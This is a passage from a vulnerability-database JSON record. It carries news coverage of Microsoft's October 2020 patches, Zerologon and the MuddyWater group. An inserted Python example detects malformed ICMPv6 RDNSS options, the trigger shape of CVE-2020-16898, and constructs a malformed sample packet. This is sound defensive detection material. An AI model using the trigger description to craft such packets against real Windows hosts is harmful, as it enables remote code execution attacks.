"63C36F7A-5F99-5A79-B99F-260360AC237F", "699EB52B-3630-500F-BA12-8F3B95E22A12", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "803A4C79-0547-5178-A113-233AC5D2498C", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8B5E018D-C89A-519A-8923-D1E3290A79C8", "92ED250D-4B79-5B70-A5ED-2A55493C90CA", "939F3BE7-AF69-5351-BD56-12412FA184C5", "9C9BD402-511C-597D-9864-647131FE6647", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "AB5BA257-13FA-5667-BDBE-A3E1C4658F49", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B5E5F84A-7647-5D17-9E1D-643518A6A3A9", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", 
"C96C8DD1-344C-5476-85AC-6D2865A5C00F", "CD749811-2E16-5303-AD4B-1A0DDBCD78A4", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D7EB3EE2-A5C4-5CC7-B84F-D32CEB99D65A", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F9B55BEE-32D1-5654-A978-E27E752E7163", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "hivepro", "idList": ["HIVEPRO:8DA601C83DB9C139357327C06B06CB36"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "kaspersky", "idList": ["KLA11929", "KLA11931"]}, {"type": "krebs", "idList": ["KREBS:7252221B56E65C46DEF83A6DDC0B70FB", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2020-16923/", "MSF:ILITIES/MSFT-CVE-2020-16951/"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1472", "MS:CVE-2020-16891", "MS:CVE-2020-16898", "MS:CVE-2020-16909", "MS:CVE-2020-16911", "MS:CVE-2020-16915", "MS:CVE-2020-16923", "MS:CVE-2020-16938", "MS:CVE-2020-16947", "MS:CVE-2020-16951", "MS:CVE-2020-16952", "MS:CVE-2020-16967", "MS:CVE-2020-16968", "MS:CVE-2020-17003"]}, {"type": "mskb", "idList": ["KB4601347"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09"]}, {"type": "mssecure", "idList": ["MSSECURE:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", 
"OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_OCT_3D_VIEWER.NASL", "SMB_NT_MS20_OCT_4580327.NASL", "SMB_NT_MS20_OCT_4580346.NASL", "SMB_NT_MS20_OCT_4580347.NASL", "SMB_NT_MS20_OCT_4580378.NASL", "SMB_NT_MS20_OCT_4580382.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS20_OCT_OUTLOOK.NASL", "SONICWALL_SNWLID-2020-0010.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612", "PACKETSTORM:160127"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "ptsecurity", "idList": ["PT-2020-29"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:7799BDEDC6C56E9CAE494D08410C252D", "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0E497787F9B42FC1D11439220E6A9D3F", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492"]}, {"type": "redhat", "idList": ["RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": 
["SECURELIST:100DB957ACFED2B9DC6D860183E5B88F", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:847981DCB9E90C51F963EE1727E40915"]}, {"type": "srcincite", "idList": ["SRC-2020-0022", "SRC-2020-0024"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:C3154ED3ABE28924B7CC42873DED19BB", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "threatpost", "idList": ["THREATPOST:033645C929899D29D91092278D188D8E", "THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:0A238D67F7286BA41103801846210F7A", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "THREATPOST:639CADC540E81321048EB418C2EC7586", "THREATPOST:701953AF963ADACDD2280B3D18B58493", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:8A8E859062970130E3F91D160F03325C", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A43BC2773FE4FB67EB7B8F584F137132", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A5D4FD6C2281AE395B821A8D0EB5736D", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:CF4E8B0929D149A75E7512A74E569009", "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", 
"THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "zdi", "idList": ["ZDI-20-1245", "ZDI-20-1246", "ZDI-20-1249", "ZDI-20-1250", "ZDI-20-1257", "ZDI-20-1258"]}, {"type": "zdt", "idList": ["1337DAY-ID-35071"]}]}, "exploitation": null, "vulnersScore": -0.4}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659899336}, "_internal": {"score_hash": "c8edffc94be13be3d45c168b21c791e9"}}
## **Related Coverage: Microsoft Releases Patches for Critical Windows TCP/IP and Other Bugs**
The Hacker News, published 2020-10-14 ([original article](<https://thehackernews.com/2020/10/windows-tcp-ip-patch-tuesday.html>)).
Microsoft on Tuesday issued fixes for 87 newly discovered security vulnerabilities as part of its [October 2020 Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Oct>), including two critical remote code execution (RCE) flaws in the Windows TCP/IP stack and in Microsoft Outlook.
Of the 87 flaws, 11 are rated Critical, 75 Important and one Moderate. They affect Windows, Office and Office Services and Web Apps, Visual Studio, Azure Functions, .NET Framework, Microsoft Dynamics, Open Source Software, Exchange Server and the Windows Codecs Library.
None of the flaws is listed as under active attack, but six were publicly known at the time of release.
Chief among the critical bugs patched this month is [CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) (CVSS score 9.8). According to Microsoft, an attacker exploits this RCE flaw in the TCP/IP stack by sending specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer, gaining arbitrary code execution on the target client or server.
According to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>) security experts, "this type of bug could be made wormable," meaning an attack could spread from one vulnerable computer to the next without any human interaction.
A second vulnerability to track is [CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>), an RCE flaw in affected versions of Outlook that can be triggered merely by viewing a specially crafted email.
"If the current user is logged on with administrative user rights, an attacker could take control of the affected system," Microsoft noted in its advisory. "An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights."
Another critical RCE vulnerability, in Windows Hyper-V ([CVE-2020-16891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16891>), CVSS score 8.8), stems from improper validation of input from an authenticated user on a guest operating system. An adversary could run a specially crafted program on a guest and cause the Hyper-V host operating system to execute arbitrary code, which makes it a guest-to-host escape.
Two other critical RCE flaws ([CVE-2020-16967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16967>) and [CVE-2020-16968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16968>)) affect the Windows Camera Codec Pack: an attacker sends a malicious file that, when opened, runs arbitrary code in the context of the current user.
Finally, the release also addresses an elevation-of-privilege flaw ([CVE-2020-16909](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16909>)) in the Windows Error Reporting (WER) component that could allow an authenticated attacker to run applications with escalated privileges and gain access to sensitive information.
Other critical flaws fixed this month include RCE bugs in SharePoint, the Media Foundation Library, the Base3D rendering engine, Graphics Components and the Windows Graphics Device Interface (GDI).
Windows users and system administrators should apply the latest security patches to mitigate these issues. To install the latest [security updates](<https://support.microsoft.com/en-in/help/4027667/windows-10-update>), go to Start > Settings > Update & Security > Windows Update and select Check for updates.
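The advisory text above describes the CVE-2020-16898 trigger only as a "specially crafted ICMPv6 Router Advertisement". The following Python is an added example, not code from Microsoft, McAfee or the article, and it builds no exploit: it walks an RA's options and reports violations of the invariants in RFC 4861 (option length never zero, every option must fit inside the packet) and RFC 8106 (an RDNSS option carries N 16-byte addresses after an 8-byte header, so its length field is 1 + 2N, always odd and at least 3). That even-length RDNSS shape is the malformed option McAfee's public "Bad Neighbor" write-up identifies as the trigger, so the check is the structural test an IDS rule or capture-triage script would apply. The packets at the bottom are constructed for the example; the resolver address comes from the RFC 3849 documentation prefix.

```python
"""
Structural checks on ICMPv6 Router Advertisement (RA) options.

Added example; not code from Microsoft, McAfee or the article. It builds no
exploit: it walks an RA's options and reports violations of the invariants in
RFC 4861 (option length never 0, options must fit the packet) and RFC 8106
(an RDNSS option carries N 16-byte addresses after an 8-byte header, so its
length field is 1 + 2N: odd and at least 3). The even-length RDNSS shape is
what McAfee's public write-up identifies as the CVE-2020-16898 trigger. The
sample packets at the bottom are constructed for this example.
"""
import struct
from typing import List

ICMPV6_ROUTER_ADVERTISEMENT = 134
OPT_RDNSS = 25        # RFC 8106 Recursive DNS Server option
RA_HEADER_LEN = 16    # type, code, checksum, hop limit, flags, lifetime, reachable, retrans


def check_router_advertisement(icmp: bytes) -> List[str]:
    """Return findings for one ICMPv6 RA message given without its IPv6 header.

    An empty list means every option is well-formed. Findings are plain strings
    so the function can feed a logging or alerting pipeline directly.
    """
    findings: List[str] = []
    if len(icmp) < RA_HEADER_LEN:
        return ["truncated: RA shorter than its 16-byte fixed header"]
    msg_type, code = icmp[0], icmp[1]
    if msg_type != ICMPV6_ROUTER_ADVERTISEMENT or code != 0:
        return [f"not a Router Advertisement (type={msg_type}, code={code})"]

    off = RA_HEADER_LEN
    while off < len(icmp):
        if len(icmp) - off < 2:
            findings.append(f"offset {off}: trailing bytes too short for an option header")
            break
        opt_type, opt_units = icmp[off], icmp[off + 1]   # length is in 8-octet units
        if opt_units == 0:
            # RFC 4861 4.6: a zero length is invalid and the packet must be discarded.
            findings.append(f"offset {off}: option type {opt_type} has length 0")
            break
        if opt_type == OPT_RDNSS and (opt_units < 3 or opt_units % 2 == 0):
            findings.append(f"offset {off}: RDNSS option length {opt_units} is not odd and >= 3; "
                            "this is the malformed shape behind CVE-2020-16898")
        opt_len = opt_units * 8
        if off + opt_len > len(icmp):
            findings.append(f"offset {off}: option type {opt_type} claims {opt_len} bytes, "
                            f"only {len(icmp) - off} remain")
            break
        off += opt_len
    return findings


def build_ra(*options: bytes) -> bytes:
    """Constructed sample: a minimal RA fixed header followed by raw options."""
    header = struct.pack("!BBHBBHII",
                         ICMPV6_ROUTER_ADVERTISEMENT, 0, 0,   # type, code, checksum (left 0)
                         64, 0, 1800,                          # cur hop limit, flags, router lifetime
                         0, 0)                                 # reachable time, retrans timer
    return header + b"".join(options)


def rdnss_option(length_units: int, addresses: List[bytes]) -> bytes:
    """Constructed RDNSS option. The length field is a parameter so a test can
    emit a deliberately wrong value; the body is zero-padded to the claimed size
    so the checker sees the bad length rather than a truncated packet."""
    body = struct.pack("!BBHI", OPT_RDNSS, length_units, 0, 3600) + b"".join(addresses)
    return body.ljust(length_units * 8, b"\x00")


# Constructed samples: one resolver address from the RFC 3849 documentation prefix.
RESOLVER = bytes.fromhex("20010db8000000000000000000000053")
GOOD_RA = build_ra(rdnss_option(3, [RESOLVER]))   # one address -> length 3, valid
BAD_RA = build_ra(rdnss_option(4, [RESOLVER]))    # even length -> flagged

if __name__ == "__main__":
    for name, pkt in (("GOOD_RA", GOOD_RA), ("BAD_RA", BAD_RA)):
        print(name, check_router_advertisement(pkt) or "ok")
```

Because the test is a protocol invariant rather than a byte signature, it does not depend on any particular exploit payload; the only expected false positives are routers that emit malformed RDNSS options themselves, which is worth knowing about anyway. Feeding it real traffic means stripping the IPv6 header first and, on a production sensor, also verifying the ICMPv6 checksum, which the sample packets leave at zero.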
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-14T10:10:00", "type": "thn", "title": "Microsoft Releases Patches For Critical Windows TCP/IP and Other Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16891", "CVE-2020-16898", "CVE-2020-16909", "CVE-2020-16947", "CVE-2020-16967", "CVE-2020-16968"], "modified": "2020-10-16T06:20:48", "id": "THN:C3154ED3ABE28924B7CC42873DED19BB", "href": "https://thehackernews.com/2020/10/windows-tcp-ip-patch-tuesday.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:43", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiVFy-c1DNicC29AR3JBTrZ5vLEcY8DjJCDttbLNNeDlQZYaSjqUwPLUJ-s1PB7sY5MtBXBQIE3kr_q_JtCC1MWrPLvh1bj_s3_LKlvzXxATEAyDwPx4nE9sOS_sXNUdyfPzB4JC4ChR3tNCPMdi7u2Kzs4yfrnB7Uh3cBZP29GPNeHzdCf28ylkvRK>)\n\nThe U.S. 
Cyber Command (USCYBERCOM) on Wednesday officially confirmed MuddyWater's ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.\n\n\"MuddyWater has been seen using a variety of techniques to maintain access to victim networks,\" USCYBERCOM's Cyber National Mission Force (CNMF) [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/12/cnmf-identifies-and-discloses-malware-used-iranian-apt-muddywater>) in a statement. \"These include side-loading [DLLs](<https://en.wikipedia.org/wiki/Dynamic-link_library>) in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.\"\n\nThe agency characterized the hacking efforts as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), corroborating earlier reports about the nation-state actor's provenance.\n\nAlso tracked under the monikers Static Kitten, Seedworm, Mercury and TEMP.Zagros, [MuddyWater](<https://malpedia.caad.fkie.fraunhofer.de/actor/muddywater>) is known for its [attacks](<https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/>) primarily directed against a wide gamut of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East. 
The group is believed to have been [active](<https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/>) at least [since 2017](<https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/>).\n\nRecent intrusions mounted by the adversary have involved exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as leveraging remote desktop management tools such as [ScreenConnect](<https://thehackernews.com/2021/02/iranian-hackers-utilize-screenconnect.html>) and [Remote Utilities](<https://thehackernews.com/2021/03/iranian-hackers-using-remote-utilities.html>) to deploy custom backdoors that could enable the attackers to gain unauthorized access to sensitive data.\n\nLast month, Symantec's Threat Hunter Team [publicized findings](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east>) about a new wave of hacking activities unleashed by the Muddywater group against a string of telecom operators and IT companies throughout the Middle East and Asia during the previous six months using a blend of legitimate tools, publicly available malware, and living-off-the-land ([LotL](<https://encyclopedia.kaspersky.com/glossary/lotl-living-off-the-land/>)) methods.\n\nAlso incorporated into its toolset is a backdoor named Mori and a piece of malware called PowGoop, a DLL loader designed to decrypt and run a PowerShell-based script that establishes network communications with a remote server.\n\nMalware samples attributed to the advanced persistent threat (APT) have been made available on the VirusTotal malware aggregation repository, which can be accessed [here](<https://www.virustotal.com/gui/user/CYBERCOM_Malware_Alert>).\n\n\"Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques,\" SentinelOne researcher Amitai Ben Shushan Ehrlich 
[said](<https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/>). \"While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T07:47:00", "type": "thn", "title": "US Cyber Command Links 'MuddyWater' Hacking Group to Iranian Intelligence", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-01-13T08:16:41", "id": "THN:A30AE10A13D33189456EB192DDF2B8C2", "href": "https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:07", "description": 
"[](<https://thehackernews.com/images/-OmeZzerf_N4/X3NtaoiyhdI/AAAAAAAAAi8/u8cq1mrPXdgdsFqdMJ1DsNqrUiSeIC0bQCLcBGAsYHQ/s728/webinar.jpg>)\n\n \nI am sure that many of you have by now heard of a recently disclosed critical Windows server vulnerability\u2014called [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>)\u2014that could let hackers completely take over enterprise networks.\n\nFor those unaware, in brief, all supported versions of the Windows Server operating systems are vulnerable to a critical privilege escalation bug that resides in the [Netlogon Remote Control](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) Protocol for Domain Controllers.\n\nIn other words, the underlying vulnerability ([CVE-2020-1472](<https://www.secura.com/pathtoimg.php?id=2055>)) could be exploited by an attacker to compromise Active Directory services, and eventually, the Windows domain without requiring any authentication.\n\nWhat's worse is that a proof-of-concept exploit for this flaw was released to the public last week, and immediately after, attackers started exploiting the weakness against unpatched systems in the wild.\n\n[](<https://thehackernews.com/images/-LlDoRgABjaM/X3NtIHP8GkI/AAAAAAAAAi0/5IgY1LPymBsVm0FHNJsBkmUWqgqC1c-UACLcBGAsYHQ/s0/zerologon.jpg>)\n\nAs described in our [coverage](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) based on a technical analysis published by Cynet security researchers, the underlying issue is Microsoft's implementation of AES-CFB8, where it failed to use unique, random salts for these Netlogon messages.\n\nThe attacker needs to send a specially crafted string of zeros in Netlogon messages to change the domain controller's password stored in the Active Directory.\n\nFor THN readers willing to learn more about this threat in detail, including technical information, mitigations, and detection techniques, they 
should join a live webinar ([register here](<https://go.cynet.com/webinar-zerologon/?utm_source=thn>)) with Aviad Hasnis, CTO at Cynet.\n\nThe free cybersecurity educational webinar is scheduled for September 30th at 5:00 PM GMT, and also aims to discuss exploits deployed in the wild to take advantage of this vulnerability.\n\nBesides this, the Cynet team has also released a free detection tool that alerts you to any Zerologon exploitation in your environment.\n\n[Register for the live webinar here](<https://go.cynet.com/webinar-zerologon/?utm_source=thn>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T17:26:00", "type": "thn", "title": "LIVE Webinar on Zerologon Vulnerability: Technical Analysis and Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-29T17:26:49", 
"id": "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "href": "https://thehackernews.com/2020/09/zerologon-cybersecurity.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-10-21T10:01:47", "description": "This month\u2019s Microsoft Patch Tuesday addresses 87 vulnerabilities with 11 of them labeled as Critical. The 11 Critical vulnerabilities cover TCP/IP Stack, SharePoint, Windows Camera Codec Pack, Graphics and several other workstation vulnerabilities. Adobe issued patches today for Adobe Flash Player.\n\n### Workstation Patches\n\nContinuing the trend, today\u2019s Patch Tuesday fixes many vulnerabilities that impact workstations. The Windows Camera Codec, GDI+, Browser, Hyper-V, Outlook, Media Foundation and Graphics components vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Windows TCP/IP RCE\n\nAn extremely critical Remote Code Execution vulnerability ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) is fixed today. Microsoft ranks this vulnerability as \u201cExploitation More Likely,\u201d and according to Microsoft and the [researchers at McAfee](<https://github.com/advanced-threat-research/CVE-2020-16898>), the vulnerability is wormable. 
It is highly recommended to prioritize these patches on all Windows 10 systems, including Microsoft DNS servers.\n\nThis vulnerability allows attackers to take complete control over Windows systems by sending malicious ICMPv6 Router Advertisement packets to vulnerable systems.\n\n### SharePoint RCE\n\nTwo remote code execution vulnerabilities ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>), [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)) are patched in SharePoint Server that would allow an authenticated user on a guest system to perform actions in the security context of an application pool process. Microsoft notes that exploitation of this vulnerability is less likely, but these patches should still be prioritized for all SharePoint servers.\n\n### Graphics RCE\n\nA remote code execution vulnerability ([CVE-2020-16923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16923>)) is patched in the Graphics component; it could be exploited when a user opens a specially crafted file. Based on the information given, this should be prioritized across all Windows servers and workstations.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb20-58.html>). 
